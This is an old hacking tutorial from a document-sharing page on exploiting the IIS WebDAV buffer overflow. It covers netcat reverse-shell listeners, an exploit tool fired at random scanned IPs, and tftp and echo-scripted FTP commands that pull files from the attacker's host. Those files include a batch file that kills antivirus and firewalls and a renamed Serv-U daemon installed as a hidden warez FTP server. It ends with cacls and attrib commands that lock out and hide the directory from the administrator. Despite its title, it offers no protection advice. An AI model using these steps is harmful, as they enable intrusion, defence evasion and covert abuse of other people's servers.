Download as TXT, PDF, TXT or read online from Scribd
Download as txt, pdf, or txt
You are on page 1/ 3
How to hack a WebDAV vulnerable server, and how to protect it
[LOCKDOWN]: Programs You need:
Servu tools: you can download yourself Netcat: xwbf-v0.3: Tftp : Virus / Firewall killer: Grap it here..............:hxxp://leetkrew.host.sk/WebDAVhack.zip start a dos window. start you do up and go the folder with nc.exe now give the follow command: nc -L -vv -p 666 and start another dos window and do : nc -L -vv -p 667 K if you done that you will see something like this: F:\>nc -L -vv -p 666 listening on [any] 666 ... You have just successfully run NetCat. It is now listening and waiting to be cha nged in a reverse command line (command line on other computer) Start the program: xwbf-v0.3 and fill in the following: Target : the IP from your scan Port : 80 Satan?s IP : Your IP. Port : 666 Custom Pads : (use default) Padding : (use default) Now all you need is a scan, check if some WebDAV scans are in the scan area. Pick a random IP and enter it into the program. Click on EXPLOIT. You should eit her see : Checking ntdll.dll buffer overflow .....CONNECTED sending evil buffer ......VULNERABLE Connecting to 'xxx.xxx.39.159' .........CONNECTED trying ret addr 0x00d000d0 ......DONE Waiting for IIS to restart .........CONNECTED trying ret addr 0x00d100d1 or Checking ntdll.dll buffer overflow .....CONNECTED sending evil buffer ...... NOT VULNERABLE If it?s vulnerable the program will start checking exploit addresses, when it ge t?s acces differs from system to system.. After a while NC.exe should display a CMD window. You now have succesfuly infilt rated the system and can choose between TFTP and ECHO hacking. create your own dir like : mkdir c:\winnt\system32\drivers\dll\ First Tftp: Start the program and push browse and select your dir with the files. then go to the remote shell and do: tftp.exe -i YOURIP get kill.bat c:\Winnt\system32\drivers\dll\kill.bat Navigate to your dir using the simple DOS command : cd C:\Winnt\system32\drivers\dll\ Now run KILL.BAT. It will start to disable any virusscanners or firewalls. When it?s finished we?ll upload the rest of the files : tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon .exe (I recommend you change the name to sth else.) tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon .ini When TFTP has finished transferring the files do the following command. servudaemon.exe /i /s /h And after that we are going to run the stro by simply using : Net start servu You can now login to your stro with the desired username and password you specif ied. Second method: Echo Hacking For this you need a seed stro, to transfer the files from. do this commands: echo open ipserver portserver >> c:\winnt\system32\drivers\dll\1.txt echo user user >> c:\winnt\system32\drivers\dll\1.txt echo password >> c:\winnt\system32\drivers\dll\1.txt echo lcd c:\winnt\system32\drivers\dll >> c:\winnt\system32\drivers\dll\1.txt echo get CommonDlg32.dll >> c:\winnt\system32\drivers\dll\1.txt echo get drvrquery32.exe >> c:\winnt\system32\drivers\dll\1.txt echo quit >> c:\winnt\system32\drivers\dll\1.txt ftp -i -n -v -s:c:\winnt\system32\drivers\dll\1.txt After doing the FTP command, it will start transferring the files from the stro to your target. What you just did with the command above is the following. You ?echoed? commands into a txt file. Then you use FTP to open the txt file and execute it?s content . The hack is almost done, only the final step to protect the dir from the admin. do this: cacls c:\winnt\system32\drivers\dll\* /T /E /P Administrator:N attrib +S +H c:\winnt\system32\drivers\dll\ /S /D if that one not work do attrib +S +H c:\winnt\system32\drivers\dll\ Now the admin can't see in the dir anymore Enjoy Your WebDAV Hack
